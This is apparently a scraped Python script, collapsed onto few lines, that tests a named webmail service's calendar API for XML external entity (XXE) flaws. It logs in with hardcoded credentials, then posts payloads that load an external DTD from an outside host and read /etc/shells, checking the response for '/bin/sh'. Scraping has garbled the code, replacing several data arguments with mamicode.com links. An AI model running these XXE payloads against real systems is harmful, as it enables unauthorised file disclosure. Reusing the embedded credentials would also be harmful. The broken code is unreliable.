import XXE_checkif __name__=="__main__":    try:        check=XXE_check.xxe_check()        #登录        input_url="http://mail.richinfo.cn/"        getLoginUrl="http://mail.richinfo.cn/webmail/login/loginapi.do"        getLoginDict={                        ‘usernumber‘:"zhangxinxin",                        ‘password‘:"xinxin123",                        ‘validateCode‘:"",                        ‘returnurl‘:"http%3A%2F%2Fmail.richinfo.cn%2Fwebmail%2Flogin%2Flogin.do",                        ‘loginType‘:"WEB",                        ‘version‘:"version",                        ‘userid‘:"zhangxinxin",                        ‘mailType‘:"0",                        ‘passwordType‘:"0",                        ‘domain‘:"richinfo.cn",                        ‘mobileNumber‘:"zhangxinxin",                        ‘model‘:"MAIL"                            }        check.login(input_url,getLoginUrl,getLoginDict)        sid=check.get_sid()#        print("main_sid=%s"% sid)                #添加用例（<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd">）        add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid        add_dict1=‘<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd"><object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" /><int name="calendarType">10</int><string name="title">test</string><string name="site">test</string><string name="content">test&test;</string><int name="labelId">10</int><string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int><int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int><string name="recEmail">zhangxinxin@richinfo.cn</string><string name="dateFlag">2014-10-29</string><string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string><string name="endTime">1930</string><int name="sendInterval">0</int><string name="week">0000000</string></object>‘.encode("ascii")        #查看        test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid        test_dict=‘<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string><string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>‘.encode("ascii")        seqNos1=check.XXE_go(add_url,add_dict1,test_url,test_dict)        print("测试用例为：<!DOCTYPE svg SYSTEM ‘http://oa05.com/11.dtd’>")#        print(seqNos1)        #删除        del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid        del_dict=(‘<object><int name="comeFrom">0</int><int name="seqNos">‘+str(seqNos1)+‘</int><int name="actionType">0</int></object>‘).encode("ascii")        check.del_test(del_url,del_dict)        #添加用例（<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]>）        add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid        add_dict2=‘<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]><object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" /><int name="calendarType">10</int><string name="title">test</string><string name="site">test</string><string name="content">test&all;</string><int name="labelId">10</int><string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int><int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int><string name="recEmail">zhangxinxin@richinfo.cn</string><string name="dateFlag">2014-10-29</string><string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string><string name="endTime">1930</string><int name="sendInterval">0</int><string name="week">0000000</string></object>‘.encode("ascii")        #查看        test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid        test_dict=‘<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string><string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>‘.encode("ascii")        seqNos2=check.XXE_go(add_url,add_dict2,test_url,test_dict)        print("测试用例为：<!DOCTYPE ANY [<!ENTITY all SYSTEM ‘file:///etc/shells’>]>")#        print(seqNos2)        #删除        del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid        del_dict=(‘<object><int name="comeFrom">0</int><int name="seqNos">‘+str(seqNos2)+‘</int><int name="actionType">0</int></object>‘).encode("ascii")        check.del_test(del_url,del_dict)            except Exception as e:        print(e)

import urllib.request,http.cookiejar,reclass xxe_check:    def __init__(self):        self.cj=http.cookiejar.CookieJar()     #获取cookie        #引用cookie        self.opener=urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cj))        self.opener.addheaders=[(‘Content-Type‘,‘application/x-www-form-urlencoded‘)]    #登录    def login(self,input_url,getLoginUrl,getLoginDict):        resp=self.opener.open(input_url)        postData=urllib.parse.urlencode(getLoginDict);        postData=postData.encode(‘utf-8‘)        resp2=self.opener.open(getLoginUrl,data=http://www.mamicode.com/postData)        #getLoginResponse=resp2.read().decode("utf-8")        #print("getLoginResponse:%s"% getLoginResponse)        f=open("cookie.txt","w")        for c in self.cj:#            print(c.name,"="*6,c.value)            f.write(c.name+"="+c.value+";")            f.write(c.name+"="+c.value+";"+"\n")                #获取sid    def get_sid(self):        #先从本地读取cookie，然后在截取其中sid的值        f=open("cookie.txt")        allmsg=f.read()        sid_location=allmsg.find("lang")#       print(sid_location)        sid=allmsg[sid_location+4:sid_location+42]        return sid        #执行XXE用例    def XXE_go(self,add_url,add_dict,test_url,test_dict):        try:#            print("++++++++++++++++++++")            resadd=self.opener.open(add_url,data=http://www.mamicode.com/add_dict)#            print("*********************************")            for_seqNos=resadd.read().decode("utf-8")            seqNos=for_seqNos[for_seqNos.find("seqNo")+7:for_seqNos.find("seqNo")+10]#            print("for_seqNos:%s"% for_seqNos)#            print("seqNos_test:%s"% seqNos)            if for_seqNos.find("S_OK")>0:                #查看日历                riliresult=self.opener.open(test_url,data=http://www.mamicode.com/test_dict)                all_msg=riliresult.read().decode("utf-8")                begin_msg=all_msg.find(seqNos)                msg=all_msg[begin_msg:begin_msg+1000]                end_msg=msg.find("}")                print(msg)                if msg[begin_msg:end_msg].find("/bin/sh")>0: #                   print(type(seqNos))                    print("存在XXE漏洞")                else:                    print("不存在XXE漏洞")            else:                print("没有发现XXE漏洞")            #判断seqNOS的值是否为空            if seqNos.strip()=="":                return 0            elif int(seqNos)>0:                return seqNos        except Exception as e:            print(e)    #删除添加的内容    def del_test(self,del_url,del_dict):        res=self.opener.open(del_url,data=http://www.mamicode.com/del_dict)        if res.read().decode("utf-8").find(‘"code":"S_OK"‘)>0:            print("删除成功！")        else:            print("删除失败！")